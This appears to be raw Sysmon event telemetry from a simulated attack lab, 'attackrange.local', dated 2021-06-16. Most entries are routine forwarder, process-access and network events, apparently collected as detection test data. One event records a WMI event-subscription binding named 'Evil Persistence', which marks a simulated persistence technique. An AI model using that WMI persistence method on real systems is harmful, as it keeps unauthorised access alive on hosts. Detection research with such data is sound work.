21:46:50.770{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED78AF955BBF56D8A6EE9D9AEF1E14F9,SHA256=AFBB63B575C197EA2BBD718C3AA2BB44FE015CFC2D780E39ABDF79B2CD9B1E8A,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000151653Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-CreatePipe2021-06-16 21:46:50.768{39BD8DE3-0F65-60CA-1100-00000000D101}968\ProtectedPrefix\LocalService\FTHPIPEC:\Windows\system32\svchost.exe 10341000x8000000000000000151652Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.768{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151651Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.768{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151650Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.768{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-0F64-60CA-0A00-00000000D101}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151649Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.568{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=96801CB889951C2B3E8DA98E259199B6,SHA256=E75A8C5B409B7DE60BD0EB883FCF4AB18739030834CEB5A52E03576F2F4C5C2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151648Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.568{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=74D5185CD1E3D07B748F0271AE005783,SHA256=7E22ED780279CE7A9BA13894585DF92389CA01FD96A323A58C7993694B2FA782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151647Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.490{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=450CD2EDA4E0F000CE1E4A927B772C06,SHA256=4C59E250D9DA00ED9DA0E5E9FC85017ED43639C440588BC07B51869971CC695D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151646Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.490{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B628A4D7F3C58B62E2E516B83A8BDEB,SHA256=0B8D6187D54FE5759FC659B51C574EC92A7DC96E204F4F22A90D32FA614B8B8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151645Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.422{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03A30378188A59495F2B3E7DD4ED998C,SHA256=3C0A3F13A5E7891AD704FB0DB8BD9678BA405DF1D9EFCA129C56514A3DC54799,IMPHASH=00000000000000000000000000000000falsetrue 21342100x8000000000000000151644Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-WmiBindingEvent2021-06-16 21:46:50.222ModifiedWIN-HOST-14\Administrator "CommandLineEventConsumer.Name=\"Evil Persistence\"" "__EventFilter.Name=\"Evil Persistence\"" 10341000x8000000000000000151643Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.206{39BD8DE3-7149-60CA-240D-00000000D101}14244012C:\Windows\system32\WerFault.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\system32\wer.dll+37d6c|C:\Windows\system32\wer.dll+382c4|C:\Windows\system32\wer.dll+38c5a|C:\Windows\system32\wer.dll+13c54|C:\Windows\system32\wer.dll+6476|C:\Windows\system32\faultrep.dll+b61e|C:\Windows\system32\faultrep.dll+8864|C:\Windows\system32\faultrep.dll+720c|C:\Windows\system32\WerFault.exe+15abe|C:\Windows\system32\WerFault.exe+13e8|C:\Windows\system32\WerFault.exe+241ad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151642Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:50.138{39BD8DE3-7149-60CA-240D-00000000D101}14244012C:\Windows\system32\WerFault.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\dbgeng.dll+280c4d|C:\Windows\SYSTEM32\dbgeng.dll+27c807|C:\Windows\SYSTEM32\dbgeng.dll+181398|C:\Windows\SYSTEM32\dbgeng.dll+1818e6|C:\Windows\SYSTEM32\dbgeng.dll+18746d|C:\Windows\SYSTEM32\dbgeng.dll+394cb|C:\Windows\SYSTEM32\dbgeng.dll+3932a|C:\Windows\SYSTEM32\dbgeng.dll+4dadb|C:\Windows\system32\faultrep.dll+110f3|C:\Windows\system32\faultrep.dll+97ee|C:\Windows\system32\faultrep.dll+b375|C:\Windows\system32\faultrep.dll+8864|C:\Windows\system32\faultrep.dll+720c|C:\Windows\system32\WerFault.exe+15abe|C:\Windows\system32\WerFault.exe+13e8|C:\Windows\system32\WerFault.exe+241ad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105022Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:51.452{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F71B0F7791B7B9C77FDB253366B2BACA,SHA256=6145C61BE83AA8F3C129B5F2504525E803C05637AC3A242DD1ECC47E666E9C05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151655Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:51.806{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=96801CB889951C2B3E8DA98E259199B6,SHA256=E75A8C5B409B7DE60BD0EB883FCF4AB18739030834CEB5A52E03576F2F4C5C2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151654Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:51.453{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CD123207E8D28B94E7665097C16BD6,SHA256=D8767310088715471CCD24086D72D0E8647478E16DBF36E7EADA4C46F698E71B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105023Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:52.133{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9245276A0AEC57C71C6693505A21EC8,SHA256=95313ED64C7D89A96E4D97A2DA6864F81E53B34B58FFC92A936BB8F45E5690AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151657Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:52.488{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FEB1A4F5A430A5B92B293A95BE9EBAB,SHA256=9F2CB9C43B4451E3C07D5655E7298397300CCC4D25A227B0730A3B11BE9C2E26,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151656Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.889{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58412-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105024Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:53.499{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD97ECEC815A4952B842D60E41DEB4C,SHA256=255444D16D362ED020120BB957CFC8F174B91BC2709D5497443A560CB5E47996,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151664Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:53.852{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151663Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:53.852{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151662Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:53.852{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151661Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:53.852{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151660Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:53.852{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151659Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:53.852{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151658Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:53.506{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3013EA8710249A9EBF4A9A124AA54789,SHA256=4EF585339F1B984AF139744D41663023795693B5200B7723C6B6B365A9EF5495,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105025Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:54.869{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A32FAD2F4BBD04A3FE0A1EE1393E800,SHA256=933380F61E02617F17BE55DAB6EDAEB713687A11E1078494D7FFDFB27592B46F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151665Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:54.521{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=263BEBD5878DBE552264A2DBCD67DCD9,SHA256=3F2DB8D1481C97CC41871EF05F6924E6C3D2665B766C1D41E2D367F57BD7396A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105026Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:53.717{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55428-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151666Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:55.587{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C2EC22E3D99595D357B40EAB870EC9F,SHA256=62A3C4DEAA723B381E812D0D8651C10CCFEF8EBD06A4A6F04972866EEF46BFB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105028Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:56.920{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D9C4C9925AF47EC396C01896D2FC81,SHA256=BB57176CAF39B907DD5C7C89BE374FA39AFEAB769FA07D2BA528E2FD0E0EA3BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105027Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:56.242{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB2F11A9C085A0218CED8B763768788,SHA256=29F817D24C0BBBBB32861A861C117A9F8B9F7F849C6444F74A69D839DC266520,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151670Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:54.942{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58413-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151669Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:56.608{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9674EA27833173094ADD2B00C4D710C6,SHA256=1970BF166E67D51D6153D5773D1C632865DC82B4A26D6E3DB3BA15C1C5A41B5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151668Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:56.224{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C7441F8F5E4289DFC5F6E70CF025023,SHA256=63D34CEDF12D46C1734CACC4313F8794CD9C7D69FA6EF51B4A221E702956C94E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151667Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:56.224{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=450CD2EDA4E0F000CE1E4A927B772C06,SHA256=4C59E250D9DA00ED9DA0E5E9FC85017ED43639C440588BC07B51869971CC695D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151671Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:57.622{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5858517DE4A35D6DEC9AC3DF10789B6,SHA256=05F70BCBFA9D52402BAC745E6FB1F48C19DB8B39A28DBD79811DC2D19C9BC2F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105037Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:58.973{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7152-60CA-3013-00000000CF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105036Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:58.970{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105035Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:58.970{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105034Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 